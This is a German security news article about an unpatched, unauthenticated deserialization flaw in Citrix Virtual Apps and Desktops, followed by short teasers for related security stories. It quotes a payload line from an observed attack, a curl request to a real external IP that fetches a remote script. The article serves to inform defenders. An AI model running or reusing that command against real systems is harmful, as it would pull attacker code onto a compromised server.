Exploit für unpatchte Citrix-Sicherheitslücke bekannt geworden

Anfang November 2024 hat Watchtowr Labs Details zu einer noch nicht gepatchten Sicherheitslücke in Citrix’ Remote-Zugriffs-Lösung veröffentlicht. Diese Schwachstelle betrifft speziell Citrix Virtual Apps and Desktops, eine Lösung, die häufig für sicheren Remote-Zugang zu Desktop-Anwendungen verwendet wird – etwa in Call-Center-Umgebungen.

Die Schwachstelle betrifft das Deserialisierungsproblem in einer .NET-Funktion, die für die Sitzungsaufzeichnung verwendet wird. Diese Verwundbarkeit ermöglicht es einem Angreifer, den Exploit ohne Authentifizierung auszulösen. Der Angriff könnte nicht nur auf den Desktop selbst abzielen, sondern aufgrund der Privilegieneskalation den gesamten Server und alle darauf laufenden Sitzungen kompromittieren.

Das Exploit wird über einen SOAP-POST-Request initiiert und enthält eine bösartige Payload, das eine curl-Anfrage zu einer entfernten URL absendet:

curl http://91.212.166.60/script_xen80-mix.php

Die angeforderte URL war momentan nicht zugänglich, was darauf hindeutet, dass der Angreifer möglicherweise IP-Adressen filtert oder für Follow-up-Angriffe speichert. Die Anfrage scheint aus einer IP-Adresse in Johannesburg, Südafrika zu stammen.

Der Exploit erfordert keine vorherige Authentifizierung, was ihn besonders gefährlich macht. Unternehmen sollten daher auch ihre Firewalls und Intrusion Detection Systeme auf verdächtige Anfragen überprüfen, die mit der beschriebenen SOAP-Post-Methode zusammenhängen.

Related Posts

Microsoft führt maschinenlesbare CSAF-Dateien für CVE-Transparenz ein

Das Microsoft Security Response Center (MSRC) kündigt in seinem neuesten Transparenz-Update die Einführung des Common Security Advisory Frameworks (CSAF) als maschinenlesbares Format für CVE-Informationen an. Dieser Schritt soll Kunden helfen, schneller auf Sicherheitslücken zu reagieren und Maßnahmen zur Risikominimierung zu implementieren. Die Einführung von CSAF erfolgt ergänzend zu den bisherigen CVE-Datenkanälen und wird neben der CVE-API und dem Security Update Guide von Microsoft angeboten.

Read More

Destatis Datenleck: Prorussische Hacker erbeuten Dokumente über deutsche Unternehmen

November 2024 – Ein schwerwiegendes Datenleck erschüttert die deutsche Statistikbehörde Destatis. Hacker, die offenbar prorussische Hintergründe haben, haben eine umfangreiche Datenbank des Statistischen Bundesamts gehackt und diese nun im Darknet zum Verkauf angeboten. In Folge dessen bieten Hacker in einem Darknet-Forum Unternehmensdaten für etwa 250 Dollar zum Kauf an, die ansonsten über Destatis bezogen werden könnten. Laut Berichten umfasst die gestohlene Datenmenge rund 3,8 GB, die vertrauliche Informationen über deutsche Unternehmen enthalten. Unter anderem sind dort Kontaktdaten, Adressen, Umsatzsteuernummern, Abteilungszugehörigkeiten und sogar Steuerdokumente aufgetaucht.

Read More

Kritische Schwachstelle im Laravel Framework umgeht Input Validation

Die kürzlich bekanntgewordene Sicherheitslücke CVE-2024-52301 im Laravel Framework bietet Angreifern eine einfache Möglichkeit die Input Validation des Frameworks zu umgehen und erfordert somit umgehendes Handeln von Administratoren. Die Schwachstelle entsteht, wenn die register_argc_argv PHP-Direktive auf on gesetzt ist. In diesem Fall können Benutzer eine speziell gestaltete Query-String in einer URL verwenden, um die Umgebung, die vom Framework zur Verarbeitung der Anfrage verwendet wird, zu manipulieren. Dies kann dazu führen, dass das Framework mit einer ungewollten Umgebungskonfiguration arbeitet.

Read More